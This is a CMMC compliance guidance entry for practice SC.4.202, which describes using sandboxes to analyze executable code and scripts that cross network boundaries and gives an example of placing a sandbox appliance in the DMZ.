Requirement text: SC.4.202: Employ mechanisms to analyze executable code and scripts (e.g., sandbox)
traversing Internet network boundaries or other organizationally defined boundaries.
DISCUSSION FROM SOURCE: CMMC
Advanced malicious executable code has become much better at evading signature-based
detection and protection capabilities. Sandboxes and other advanced analytics are more
advanced defenses that allow the code or script to execute in an isolated, controlled, and
instrumented environment to detect signs of malicious activity.
CMMC CLARIFICATION
The organization shall install systems that automatically analyze executable and mobile code
passing through the system boundary (e.g., downloaded from the Internet or other
transmission method.) This practice is not focused on email, which is covered in practice
SI.3.220. Any executable or mobile code identified as suspicious should be quarantined and
not allowed to pass through to the user until confirmed not to be malware or required for a
business purposes.
Example
You are the data security manager for the organization. You have learned that staff routinely
browse the Internet and download PDF files and executables as part of their work
assignments. To ensure the downloaded files do not contain malware, you install a sandbox
appliance in the DMZ which checks all downloads for malicious content.
References
• CMMC
• NIST SP 800-53 Rev 4 SC-44